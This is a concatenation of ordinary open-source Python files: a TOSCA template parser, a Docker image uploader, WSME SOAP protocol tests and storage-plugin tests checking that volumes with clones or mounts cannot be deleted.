relationship_templates <EOL> def _outputs ( self ) : <EOL> return self . topology_template . outputs <EOL> def _tpl_version ( self ) : <EOL> return self . tpl . get ( DEFINITION_VERSION ) <EOL> def _tpl_description ( self ) : <EOL> desc = self . tpl . get ( DESCRIPTION ) <EOL> if desc : <EOL> return desc . rstrip ( ) <EOL> def _tpl_imports ( self ) : <EOL> return self . tpl . get ( IMPORTS ) <EOL> def _tpl_relationship_types ( self ) : <EOL> return self . _get_custom_types ( RELATIONSHIP_TYPES ) <EOL> def _tpl_relationship_templates ( self ) : <EOL> topology_template = self . _tpl_topology_template ( ) <EOL> return topology_template . get ( RELATIONSHIP_TEMPLATES ) <EOL> def _tpl_topology_template ( self ) : <EOL> return self . tpl . get ( TOPOLOGY_TEMPLATE ) <EOL> def _get_all_custom_defs ( self , imports = None ) : <EOL> types = [ IMPORTS , NODE_TYPES , CAPABILITY_TYPES , RELATIONSHIP_TYPES , <EOL> DATA_TYPES , POLICY_TYPES , GROUP_TYPES ] <EOL> custom_defs_final = { } <EOL> custom_defs = self . _get_custom_types ( types , imports ) <EOL> if custom_defs : <EOL> custom_defs_final . update ( custom_defs ) <EOL> if custom_defs . get ( IMPORTS ) : <EOL> import_defs = self . _get_all_custom_defs ( <EOL> custom_defs . get ( IMPORTS ) ) <EOL> custom_defs_final . update ( import_defs ) <EOL> custom_defs_final . pop ( IMPORTS , None ) <EOL> return custom_defs_final <EOL> def _get_custom_types ( self , type_definitions , imports = None ) : <EOL> """<STR_LIT>""" <EOL> custom_defs = { } <EOL> type_defs = [ ] <EOL> if not isinstance ( type_definitions , list ) : <EOL> type_defs . append ( type_definitions ) <EOL> else : <EOL> type_defs = type_definitions <EOL> if not imports : <EOL> imports = self . _tpl_imports ( ) <EOL> if imports : <EOL> custom_defs = toscaparser . imports . ImportsLoader ( imports , self . path , <EOL> type_defs , self . tpl ) . 
get_custom_defs ( ) <EOL> if not custom_defs : <EOL> return <EOL> for type_def in type_defs : <EOL> if type_def != IMPORTS : <EOL> inner_custom_types = self . tpl . get ( type_def ) or { } <EOL> if inner_custom_types : <EOL> custom_defs . update ( inner_custom_types ) <EOL> return custom_defs <EOL> def _validate_field ( self ) : <EOL> version = self . _tpl_version ( ) <EOL> if not version : <EOL> ExceptionCollector . appendException ( <EOL> MissingRequiredFieldError ( what = '<STR_LIT>' , <EOL> required = DEFINITION_VERSION ) ) <EOL> else : <EOL> self . _validate_version ( version ) <EOL> self . version = version <EOL> for name in self . tpl : <EOL> if ( name not in SECTIONS and <EOL> name not in self . ADDITIONAL_SECTIONS . get ( version , ( ) ) ) : <EOL> ExceptionCollector . appendException ( <EOL> UnknownFieldError ( what = '<STR_LIT>' , field = name ) ) <EOL> def _validate_version ( self , version ) : <EOL> if version not in self . VALID_TEMPLATE_VERSIONS : <EOL> ExceptionCollector . appendException ( <EOL> InvalidTemplateVersion ( <EOL> what = version , <EOL> valid_versions = '<STR_LIT:U+002CU+0020>' . join ( self . VALID_TEMPLATE_VERSIONS ) ) ) <EOL> else : <EOL> if version != '<STR_LIT>' : <EOL> update_definitions ( version ) <EOL> def _get_path ( self , path ) : <EOL> if path . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> return path <EOL> elif path . lower ( ) . endswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> csar = CSAR ( path , self . a_file ) <EOL> if csar . validate ( ) : <EOL> csar . decompress ( ) <EOL> self . a_file = True <EOL> return os . path . join ( csar . temp_dir , csar . get_main_template ( ) ) <EOL> else : <EOL> ExceptionCollector . appendException ( <EOL> ValueError ( _ ( '<STR_LIT>' ) <EOL> % { '<STR_LIT:path>' : path } ) ) <EOL> def verify_template ( self ) : <EOL> if ExceptionCollector . exceptionsCaught ( ) : <EOL> if self . 
input_path : <EOL> raise ValidationError ( <EOL> message = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> % { '<STR_LIT:path>' : self . input_path } ) + <EOL> '<STR_LIT>' . join ( ExceptionCollector . getExceptionsReport ( ) ) ) <EOL> else : <EOL> raise ValidationError ( <EOL> message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) + <EOL> '<STR_LIT>' . join ( ExceptionCollector . getExceptionsReport ( ) ) ) <EOL> else : <EOL> if self . input_path : <EOL> msg = ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % { '<STR_LIT:path>' : self . input_path } ) <EOL> else : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> log . info ( msg ) </s>
<s> import abc <EOL> import logging <EOL> import six <EOL> from docker import Client <EOL> from tripleo_common . image . base import BaseImageManager <EOL> from tripleo_common . image . exception import ImageUploaderException <EOL> class ImageUploadManager ( BaseImageManager ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ + '<STR_LIT>' ) <EOL> def __init__ ( self , config_files , verbose = False , debug = False ) : <EOL> super ( ImageUploadManager , self ) . __init__ ( config_files ) <EOL> def upload ( self ) : <EOL> """<STR_LIT>""" <EOL> self . logger . info ( '<STR_LIT>' % self . config_files ) <EOL> upload_images = self . load_config_files ( self . CONFIG_SECTIONS [ <NUM_LIT:1> ] ) <EOL> for item in upload_images : <EOL> image_name = item . get ( '<STR_LIT>' ) <EOL> uploader = item . get ( '<STR_LIT>' ) <EOL> pull_source = item . get ( '<STR_LIT>' ) <EOL> push_destination = item . get ( '<STR_LIT>' ) <EOL> self . logger . info ( '<STR_LIT>' % image_name ) <EOL> uploader = ImageUploader . get_uploader ( uploader ) <EOL> uploader . upload_image ( image_name , pull_source , push_destination ) <EOL> return upload_images <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class ImageUploader ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def get_uploader ( uploader ) : <EOL> if uploader == '<STR_LIT>' : <EOL> return DockerImageUploader ( ) <EOL> raise ImageUploaderException ( '<STR_LIT>' ) <EOL> @ abc . abstractmethod <EOL> def upload_image ( self , image_name , pull_source , push_destination ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DockerImageUploader ( ImageUploader ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . getLogger ( __name__ + '<STR_LIT>' ) <EOL> def upload_image ( self , image_name , pull_source , push_destination ) : <EOL> dockerc = Client ( base_url = '<STR_LIT>' ) <EOL> image = image_name . rpartition ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> tag = image_name . 
rpartition ( '<STR_LIT::>' ) [ <NUM_LIT:2> ] <EOL> repo = pull_source + '<STR_LIT:/>' + image <EOL> response = [ line for line in dockerc . pull ( repo , <EOL> tag = tag , stream = True , insecure_registry = True ) ] <EOL> self . logger . debug ( response ) <EOL> full_image = repo + '<STR_LIT::>' + tag <EOL> new_repo = push_destination + '<STR_LIT:/>' + image <EOL> response = dockerc . tag ( image = full_image , repository = new_repo , <EOL> tag = tag , force = True ) <EOL> self . logger . debug ( response ) <EOL> response = [ line for line in dockerc . push ( new_repo , <EOL> tag = tag , stream = True , insecure_registry = True ) ] <EOL> self . logger . debug ( response ) <EOL> self . logger . info ( '<STR_LIT>' % image_name ) </s>
<s> import setuptools <EOL> setuptools . setup ( <EOL> setup_requires = [ '<STR_LIT>' ] , <EOL> pbr = True , <EOL> ) </s>
<s> from setuptools import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> package = [ '<STR_LIT>' ] ) </s>
<s> from wsme import types <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> def getdesc ( root , host_url = '<STR_LIT>' ) : <EOL> methods = { } <EOL> for path , funcdef in root . getapi ( ) : <EOL> method = funcdef . extra_options . get ( '<STR_LIT>' , None ) <EOL> name = '<STR_LIT:_>' . join ( path ) <EOL> if method is not None : <EOL> path = path [ : - <NUM_LIT:1> ] <EOL> else : <EOL> method = '<STR_LIT:GET>' <EOL> for argdef in funcdef . arguments : <EOL> if types . iscomplex ( argdef . datatype ) or types . isarray ( argdef . datatype ) or types . isdict ( argdef . datatype ) : <EOL> method = '<STR_LIT:POST>' <EOL> break <EOL> required_params = [ ] <EOL> optional_params = [ ] <EOL> for argdef in funcdef . arguments : <EOL> if method == '<STR_LIT:GET>' and argdef . mandatory : <EOL> required_params . append ( argdef . name ) <EOL> else : <EOL> optional_params . append ( argdef . name ) <EOL> methods [ name ] = { <EOL> '<STR_LIT>' : method , <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' . join ( path ) <EOL> } <EOL> if required_params : <EOL> methods [ name ] [ '<STR_LIT>' ] = required_params <EOL> if optional_params : <EOL> methods [ name ] [ '<STR_LIT>' ] = optional_params <EOL> if funcdef . doc : <EOL> methods [ name ] [ '<STR_LIT>' ] = funcdef . doc <EOL> formats = [ ] <EOL> for p in root . protocols : <EOL> if p . name == '<STR_LIT>' : <EOL> formats . append ( '<STR_LIT>' ) <EOL> if p . name == '<STR_LIT>' : <EOL> formats . append ( '<STR_LIT>' ) <EOL> api = { <EOL> '<STR_LIT>' : host_url + root . _webpath , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : getattr ( root , '<STR_LIT:name>' , '<STR_LIT:name>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : methods <EOL> } <EOL> return json . dumps ( api , indent = <NUM_LIT:4> ) </s>
<s> import decimal <EOL> import datetime <EOL> import base64 <EOL> import six <EOL> import wsme . tests . protocol <EOL> try : <EOL> import xml . etree . ElementTree as et <EOL> except : <EOL> import cElementTree as et <EOL> import suds . cache <EOL> import suds . client <EOL> import suds . transport <EOL> import wsme . utils <EOL> class XDecimal ( suds . xsd . sxbuiltin . XBuiltin ) : <EOL> def translate ( self , value , topython = True ) : <EOL> if topython : <EOL> if isinstance ( value , six . string_types ) and len ( value ) : <EOL> return decimal . Decimal ( value ) <EOL> else : <EOL> if isinstance ( value , ( decimal . Decimal , int , float ) ) : <EOL> return str ( value ) <EOL> return value <EOL> suds . xsd . sxbuiltin . Factory . tags [ '<STR_LIT>' ] = XDecimal <EOL> class WebtestSudsTransport ( suds . transport . Transport ) : <EOL> def __init__ ( self , app ) : <EOL> suds . transport . Transport . __init__ ( self ) <EOL> self . app = app <EOL> def open ( self , request ) : <EOL> res = self . app . get ( request . url , headers = request . headers ) <EOL> return six . BytesIO ( res . body ) <EOL> def send ( self , request ) : <EOL> res = self . app . post ( <EOL> request . url , <EOL> request . message , <EOL> headers = dict ( ( <EOL> ( key , str ( value ) ) for key , value in request . headers . items ( ) <EOL> ) ) , <EOL> expect_errors = True <EOL> ) <EOL> return suds . transport . Reply ( <EOL> res . status_int , <EOL> dict ( res . headers ) , <EOL> res . body <EOL> ) <EOL> class SudsCache ( suds . cache . Cache ) : <EOL> def __init__ ( self ) : <EOL> self . d = { } <EOL> def get ( self , id ) : <EOL> return self . d . get ( id ) <EOL> def getf ( self , id ) : <EOL> b = self . get ( id ) <EOL> if b is not None : <EOL> return six . StringIO ( self . get ( id ) ) <EOL> def put ( self , id , bfr ) : <EOL> self . d [ id ] = bfr <EOL> def putf ( self , id , fp ) : <EOL> self . put ( id , fp . 
read ( ) ) <EOL> def purge ( self , id ) : <EOL> try : <EOL> del self . d [ id ] <EOL> except : <EOL> pass <EOL> def clear ( self , id ) : <EOL> self . d = { } <EOL> sudscache = SudsCache ( ) <EOL> tns = "<STR_LIT>" <EOL> typenamespace = "<STR_LIT>" <EOL> soapenv_ns = '<STR_LIT>' <EOL> xsi_ns = '<STR_LIT>' <EOL> body_qn = '<STR_LIT>' % soapenv_ns <EOL> fault_qn = '<STR_LIT>' % soapenv_ns <EOL> faultcode_qn = '<STR_LIT>' % soapenv_ns <EOL> faultstring_qn = '<STR_LIT>' % soapenv_ns <EOL> faultdetail_qn = '<STR_LIT>' % soapenv_ns <EOL> type_qn = '<STR_LIT>' % xsi_ns <EOL> nil_qn = '<STR_LIT>' % xsi_ns <EOL> def build_soap_message ( method , params = "<STR_LIT>" ) : <EOL> message = """<STR_LIT>""" % dict ( method = method , params = params , typenamespace = typenamespace ) <EOL> return message <EOL> python_types = { <EOL> int : ( '<STR_LIT>' , str ) , <EOL> float : ( '<STR_LIT>' , str ) , <EOL> bool : ( '<STR_LIT>' , str ) , <EOL> wsme . types . bytes : ( <EOL> '<STR_LIT>' , <EOL> lambda x : x . decode ( '<STR_LIT:ascii>' ) if isinstance ( x , wsme . types . bytes ) else x <EOL> ) , <EOL> wsme . types . text : ( '<STR_LIT>' , wsme . types . text ) , <EOL> wsme . types . binary : ( <EOL> '<STR_LIT>' , <EOL> lambda x : base64 . encodestring ( x ) . decode ( '<STR_LIT:ascii>' ) <EOL> ) , <EOL> decimal . Decimal : ( '<STR_LIT>' , str ) , <EOL> datetime . date : ( '<STR_LIT>' , datetime . date . isoformat ) , <EOL> datetime . time : ( '<STR_LIT>' , datetime . time . isoformat ) , <EOL> datetime . datetime : ( '<STR_LIT>' , datetime . datetime . isoformat ) , <EOL> } <EOL> array_types = { <EOL> wsme . types . bytes : "<STR_LIT>" , <EOL> wsme . types . text : "<STR_LIT>" , <EOL> int : "<STR_LIT>" , <EOL> float : "<STR_LIT>" , <EOL> bool : "<STR_LIT>" , <EOL> datetime . datetime : "<STR_LIT>" <EOL> } <EOL> if not six . PY3 : <EOL> array_types [ long ] = "<STR_LIT>" <EOL> def tosoap ( tag , value ) : <EOL> el = et . 
Element ( tag ) <EOL> if isinstance ( value , tuple ) : <EOL> value , datatype = value <EOL> else : <EOL> datatype = type ( value ) <EOL> if value is None : <EOL> el . set ( '<STR_LIT>' , '<STR_LIT:true>' ) <EOL> return el <EOL> if datatype in python_types : <EOL> stype , conv = python_types [ datatype ] <EOL> el . text = conv ( value ) <EOL> el . set ( '<STR_LIT>' , stype ) <EOL> el . text = str ( value ) <EOL> return el <EOL> def tosuds ( client , value ) : <EOL> if value is None : <EOL> return None <EOL> if isinstance ( value , tuple ) : <EOL> value , datatype = value <EOL> else : <EOL> datatype = type ( value ) <EOL> if value is None : <EOL> return None <EOL> if isinstance ( datatype , list ) : <EOL> if datatype [ <NUM_LIT:0> ] in array_types : <EOL> tname = array_types [ datatype [ <NUM_LIT:0> ] ] <EOL> else : <EOL> tname = datatype [ <NUM_LIT:0> ] . __name__ + '<STR_LIT>' <EOL> o = client . factory . create ( '<STR_LIT>' + tname ) <EOL> o . item = [ tosuds ( client , ( item , datatype [ <NUM_LIT:0> ] ) ) for item in value ] <EOL> return o <EOL> elif datatype in python_types : <EOL> return python_types [ datatype ] [ <NUM_LIT:1> ] ( value ) <EOL> else : <EOL> o = client . factory . create ( '<STR_LIT>' + datatype . __name__ ) <EOL> for attr in datatype . _wsme_attributes : <EOL> if attr . name in value : <EOL> setattr ( <EOL> o , attr . name , <EOL> tosuds ( client , ( value [ attr . name ] , attr . datatype ) ) <EOL> ) <EOL> return o <EOL> def read_bool ( value ) : <EOL> return value == '<STR_LIT:true>' <EOL> soap_types = { <EOL> '<STR_LIT>' : wsme . types . text , <EOL> '<STR_LIT>' : int , <EOL> '<STR_LIT>' : int if six . PY3 else long , <EOL> '<STR_LIT>' : float , <EOL> '<STR_LIT>' : decimal . Decimal , <EOL> '<STR_LIT>' : read_bool , <EOL> '<STR_LIT>' : wsme . utils . parse_isodate , <EOL> '<STR_LIT>' : wsme . utils . parse_isotime , <EOL> '<STR_LIT>' : wsme . utils . parse_isodatetime , <EOL> '<STR_LIT>' : base64 . 
decodestring , <EOL> } <EOL> def fromsoap ( el ) : <EOL> if el . get ( nil_qn ) == '<STR_LIT:true>' : <EOL> return None <EOL> t = el . get ( type_qn ) <EOL> if t == '<STR_LIT>' : <EOL> return wsme . types . text ( el . text if el . text else '<STR_LIT>' ) <EOL> if t in soap_types : <EOL> return soap_types [ t ] ( el . text ) <EOL> elif t and t . endswith ( '<STR_LIT>' ) : <EOL> return [ fromsoap ( i ) for i in el ] <EOL> else : <EOL> d = { } <EOL> for child in el : <EOL> name = child . tag <EOL> assert name . startswith ( '<STR_LIT>' % typenamespace ) , name <EOL> name = name [ len ( typenamespace ) + <NUM_LIT:2> : ] <EOL> d [ name ] = fromsoap ( child ) <EOL> return d <EOL> def tobytes ( value ) : <EOL> if isinstance ( value , wsme . types . text ) : <EOL> value = value . encode ( ) <EOL> return value <EOL> def tobin ( value ) : <EOL> value = base64 . decodestring ( value . encode ( ) ) <EOL> return value <EOL> fromsuds_types = { <EOL> wsme . types . binary : tobin , <EOL> wsme . types . bytes : tobytes , <EOL> decimal . Decimal : decimal . Decimal , <EOL> } <EOL> def fromsuds ( dt , value ) : <EOL> if value is None : <EOL> return None <EOL> if isinstance ( dt , list ) : <EOL> return [ fromsuds ( dt [ <NUM_LIT:0> ] , item ) for item in value . item ] <EOL> if wsme . types . isarray ( dt ) : <EOL> return [ fromsuds ( dt . item_type , item ) for item in value . item ] <EOL> if wsme . types . isusertype ( dt ) and dt not in fromsuds_types : <EOL> dt = dt . basetype <EOL> if dt in fromsuds_types : <EOL> print ( dt , value ) <EOL> value = fromsuds_types [ dt ] ( value ) <EOL> print ( value ) <EOL> return value <EOL> if wsme . types . iscomplex ( dt ) : <EOL> d = { } <EOL> for attrdef in dt . _wsme_attributes : <EOL> if not hasattr ( value , attrdef . name ) : <EOL> continue <EOL> d [ attrdef . name ] = fromsuds ( <EOL> attrdef . datatype , getattr ( value , attrdef . name ) <EOL> ) <EOL> return d <EOL> return value <EOL> class TestSOAP ( wsme . tests . protocol . 
ProtocolTestCase ) : <EOL> protocol = '<STR_LIT>' <EOL> protocol_options = dict ( tns = tns , typenamespace = typenamespace ) <EOL> ws_path = '<STR_LIT:/>' <EOL> _sudsclient = None <EOL> def setUp ( self ) : <EOL> wsme . tests . protocol . ProtocolTestCase . setUp ( self ) <EOL> def test_simple_call ( self ) : <EOL> message = build_soap_message ( '<STR_LIT>' ) <EOL> print ( message ) <EOL> res = self . app . post ( <EOL> self . ws_path , <EOL> message , <EOL> headers = { "<STR_LIT:Content-Type>" : "<STR_LIT>" } , <EOL> expect_errors = True <EOL> ) <EOL> print ( res . body ) <EOL> assert res . status . startswith ( '<STR_LIT>' ) <EOL> def call ( self , fpath , _rt = None , _accept = None , _no_result_decode = False , <EOL> ** kw ) : <EOL> if _no_result_decode or _accept or self . _testMethodName in ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) : <EOL> return self . raw_call ( fpath , _rt , _accept , _no_result_decode , ** kw ) <EOL> path = fpath . strip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> methodname = '<STR_LIT>' . join ( [ path [ <NUM_LIT:0> ] ] + [ i . capitalize ( ) for i in path [ <NUM_LIT:1> : ] ] ) <EOL> m = getattr ( self . sudsclient . service , methodname ) <EOL> kw = dict ( ( <EOL> ( key , tosuds ( self . sudsclient , value ) ) for key , value in kw . items ( ) <EOL> ) ) <EOL> print ( kw ) <EOL> try : <EOL> return fromsuds ( _rt , m ( ** kw ) ) <EOL> except suds . WebFault as exc : <EOL> raise wsme . tests . protocol . CallException ( <EOL> exc . fault . faultcode , <EOL> exc . fault . faultstring , <EOL> getattr ( exc . fault , '<STR_LIT>' , None ) or None <EOL> ) <EOL> def raw_call ( self , fpath , _rt = None , _accept = None , _no_result_decode = False , <EOL> ** kw ) : <EOL> path = fpath . strip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> methodname = '<STR_LIT>' . join ( [ path [ <NUM_LIT:0> ] ] + [ i . capitalize ( ) for i in path [ <NUM_LIT:1> : ] ] ) <EOL> if kw : <EOL> el = et . 
Element ( '<STR_LIT>' ) <EOL> for key , value in kw . items ( ) : <EOL> el . append ( tosoap ( key , value ) ) <EOL> params = six . b ( "<STR_LIT:\n>" ) . join ( et . tostring ( el ) for el in el ) <EOL> else : <EOL> params = "<STR_LIT>" <EOL> methodname = '<STR_LIT>' . join ( [ path [ <NUM_LIT:0> ] ] + [ i . capitalize ( ) for i in path [ <NUM_LIT:1> : ] ] ) <EOL> message = build_soap_message ( methodname , params ) <EOL> print ( message ) <EOL> headers = { "<STR_LIT:Content-Type>" : "<STR_LIT>" } <EOL> if _accept is not None : <EOL> headers [ '<STR_LIT>' ] = _accept <EOL> res = self . app . post ( <EOL> self . ws_path , <EOL> message , <EOL> headers = headers , <EOL> expect_errors = True <EOL> ) <EOL> print ( "<STR_LIT>" , res . status , "<STR_LIT>" , res . body ) <EOL> if _no_result_decode : <EOL> return res <EOL> el = et . fromstring ( res . body ) <EOL> body = el . find ( body_qn ) <EOL> print ( body ) <EOL> if res . status_int == <NUM_LIT:200> : <EOL> response_tag = '<STR_LIT>' % ( typenamespace , methodname ) <EOL> r = body . find ( response_tag ) <EOL> result = r . find ( '<STR_LIT>' % typenamespace ) <EOL> print ( "<STR_LIT>" , result ) <EOL> return fromsoap ( result ) <EOL> elif res . status_int == <NUM_LIT> : <EOL> fault = body . find ( fault_qn ) <EOL> raise wsme . tests . protocol . CallException ( <EOL> fault . find ( faultcode_qn ) . text , <EOL> fault . find ( faultstring_qn ) . text , <EOL> "<STR_LIT>" ) <EOL> elif res . status_int == <NUM_LIT> : <EOL> fault = body . find ( fault_qn ) <EOL> raise wsme . tests . protocol . CallException ( <EOL> fault . find ( faultcode_qn ) . text , <EOL> fault . find ( faultstring_qn ) . text , <EOL> fault . find ( faultdetail_qn ) is not None and <EOL> fault . find ( faultdetail_qn ) . text or None ) <EOL> @ property <EOL> def sudsclient ( self ) : <EOL> if self . _sudsclient is None : <EOL> self . _sudsclient = suds . client . Client ( <EOL> self . 
ws_path + '<STR_LIT>' , <EOL> transport = WebtestSudsTransport ( self . app ) , <EOL> cache = sudscache <EOL> ) <EOL> return self . _sudsclient <EOL> def test_wsdl ( self ) : <EOL> c = self . sudsclient <EOL> assert c . wsdl . tns [ <NUM_LIT:1> ] == tns , c . wsdl . tns <EOL> sd = c . sd [ <NUM_LIT:0> ] <EOL> assert len ( sd . ports ) == <NUM_LIT:1> <EOL> port , methods = sd . ports [ <NUM_LIT:0> ] <EOL> self . assertEqual ( len ( methods ) , <NUM_LIT> ) <EOL> methods = dict ( methods ) <EOL> assert '<STR_LIT>' in methods <EOL> print ( methods ) <EOL> assert methods [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:value>' <EOL> def test_return_nesteddict ( self ) : <EOL> pass <EOL> def test_setnesteddict ( self ) : <EOL> pass <EOL> def test_return_objectdictattribute ( self ) : <EOL> pass <EOL> def test_setnested_nullobj ( self ) : <EOL> pass </s>
<s> from __future__ import absolute_import <EOL> from . span import Span <EOL> from . span import start_child_span <EOL> from . span import canonicalize_baggage_key <EOL> from . tracer import Tracer <EOL> from . propagation import Format <EOL> from . propagation import InvalidCarrierException <EOL> from . propagation import TraceCorruptedException <EOL> from . propagation import UnsupportedFormatException <EOL> tracer = Tracer ( ) </s>
<s> """<STR_LIT>""" <EOL> from ovs_common import OVSPluginTestCase , VPOOL_MOUNTPOINT , cinder_client_exceptions <EOL> class OVSPluginProtectionTestCase ( OVSPluginTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_not_allowed_to_delete_volume_with_clones ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _debug ( '<STR_LIT>' ) <EOL> volume , volume_name , file_name = self . _new_volume ( ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name ) , '<STR_LIT>' ) <EOL> clone , clone_name , clone_file_name = self . _new_volume_from_volume ( volume ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( clone_file_name ) , '<STR_LIT>' % ( clone_file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( clone_file_name ) , '<STR_LIT>' ) <EOL> self . assertRaises ( RuntimeError , self . _remove_volume , volume , volume_name , <NUM_LIT:5> ) <EOL> self . _cinder_reset_volume_state ( volume ) <EOL> self . assertTrue ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name ) , '<STR_LIT>' ) <EOL> self . _remove_volume ( clone , clone_name ) <EOL> self . assertFalse ( self . _file_exists_on_mountpoint ( clone_file_name ) , '<STR_LIT>' % ( clone_file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( clone_file_name , exists = False ) , '<STR_LIT>' ) <EOL> self . _remove_volume ( volume , volume_name ) <EOL> self . assertFalse ( self . _file_exists_on_mountpoint ( file_name ) , '<STR_LIT>' % ( file_name , VPOOL_MOUNTPOINT ) ) <EOL> self . assertTrue ( self . _ovs_devicename_in_vdisklist ( file_name , exists = False ) , '<STR_LIT>' ) <EOL> self . 
# NOTE(review): this chunk starts mid-method — the next line is the tail of the
# preceding test method (its `self.` prefix lies outside this chunk).
        _debug('<STR_LIT>')

    def test_not_allowed_to_delete_clone_of_snapshot(self):
        """Deleting a volume or snapshot with a dependent clone must fail.

        Flow: create volume -> snapshot -> clone from snapshot, then verify:
        - removing the source volume raises cinder BadRequest,
        - removing the snapshot raises RuntimeError,
        - after the clone is removed, the snapshot can be removed (force) and
          finally the volume, each disappearance checked both on the vPool
          mountpoint and in the OVS vdisk model.
        """
        self._debug('<STR_LIT>')
        volume, volume_name, file_name = self._new_volume()
        # Volume must be visible on the vPool mountpoint and in the OVS model.
        self.assertTrue(self._file_exists_on_mountpoint(file_name), '<STR_LIT>' % (file_name, VPOOL_MOUNTPOINT))
        self.assertTrue(self._ovs_devicename_in_vdisklist(file_name), '<STR_LIT>')
        snapshot, snap_name = self._new_snapshot(volume)
        cinder_snapshots = self._cinder_list_snapshots()
        self.assertTrue(snapshot.id in cinder_snapshots.keys(), '<STR_LIT>')
        snapshot_name = cinder_snapshots[snapshot.id]
        self.assertTrue(snapshot_name == snap_name, '<STR_LIT>' % snapshot_name)
        self.assertTrue(self._ovs_snapshot_id_in_vdisklist_snapshots(snapshot.id), '<STR_LIT>')
        clone, clone_name, clone_file_name = self._new_volume_from_snapshot(snapshot)
        self.assertTrue(self._file_exists_on_mountpoint(clone_file_name), '<STR_LIT>' % (clone_file_name, VPOOL_MOUNTPOINT))
        self.assertTrue(self._ovs_devicename_in_vdisklist(clone_file_name), '<STR_LIT>')
        # Source volume removal must be rejected while the clone exists.
        self.assertRaises(cinder_client_exceptions.BadRequest, self._remove_volume, volume, volume_name, <NUM_LIT:5>)
        self._cinder_reset_volume_state(volume)
        self.assertTrue(self._file_exists_on_mountpoint(file_name), '<STR_LIT>' % (file_name, VPOOL_MOUNTPOINT))
        self.assertTrue(self._ovs_devicename_in_vdisklist(file_name), '<STR_LIT>')
        # Snapshot removal must likewise be rejected while the clone exists.
        self.assertRaises(RuntimeError, self._remove_snapshot, snap_name, snapshot, <NUM_LIT:5>)
        self._cinder_reset_snapshot_state(snapshot)
        cinder_snapshots = self._cinder_list_snapshots()
        self.assertTrue(snapshot.id in cinder_snapshots.keys(), '<STR_LIT>')
        # Remove clone first, then the snapshot (forced), then the volume.
        self._remove_volume(clone, clone_name)
        self.assertFalse(self._file_exists_on_mountpoint(clone_file_name), '<STR_LIT>' % (clone_file_name, VPOOL_MOUNTPOINT))
        self.assertTrue(self._ovs_devicename_in_vdisklist(clone_file_name, exists=False), '<STR_LIT>')
        self._remove_snapshot(snap_name, snapshot, force=True)
        cinder_snapshots = self._cinder_list_snapshots()
        self.assertFalse(snapshot.id in cinder_snapshots.keys(), '<STR_LIT>')
        self._remove_volume(volume, volume_name)
        self.assertFalse(self._file_exists_on_mountpoint(file_name), '<STR_LIT>' % (file_name, VPOOL_MOUNTPOINT))
        self.assertTrue(self._ovs_devicename_in_vdisklist(file_name, exists=False), '<STR_LIT>')
        self._debug('<STR_LIT>')

    def test_not_allowed_to_delete_volume_local_mounted(self):
        """A locally mounted volume cannot be deleted.

        While the volume's file is mounted, _remove_volume must raise
        RuntimeError; after unmounting, removal succeeds and the volume
        disappears from the mountpoint and the OVS vdisk model.
        """
        self._debug('<STR_LIT>')
        volume, volume_name, file_name = self._new_volume_from_default_image()
        self.assertTrue(self._file_exists_on_mountpoint(file_name), '<STR_LIT>' % (file_name, VPOOL_MOUNTPOINT))
        self.assertTrue(self._ovs_devicename_in_vdisklist(file_name), '<STR_LIT>')
        self._mount_volume_by_filename(file_name)
        # Deletion must be refused while mounted.
        self.assertRaises(RuntimeError, self._remove_volume, volume, volume_name, <NUM_LIT:5>)
        self._cinder_reset_volume_state(volume)
        self.assertTrue(self._file_exists_on_mountpoint(file_name), '<STR_LIT>' % (file_name, VPOOL_MOUNTPOINT))
        self.assertTrue(self._ovs_devicename_in_vdisklist(file_name), '<STR_LIT>')
        self._umount_volume(file_name)
        # Once unmounted, removal should succeed.
        self._remove_volume(volume, volume_name)
        self.assertFalse(self._file_exists_on_mountpoint(file_name), '<STR_LIT>' % (file_name, VPOOL_MOUNTPOINT))
        self.assertTrue(self._ovs_devicename_in_vdisklist(file_name, exists=False), '<STR_LIT>')
        self._debug('<STR_LIT>')
"""<STR_LIT>"""
from ovs.dal.dataobject import DataObject
from ovs.dal.structures import Property, Relation, Dynamic
from ovs.dal.hybrids.mgmtcenter import MgmtCenter
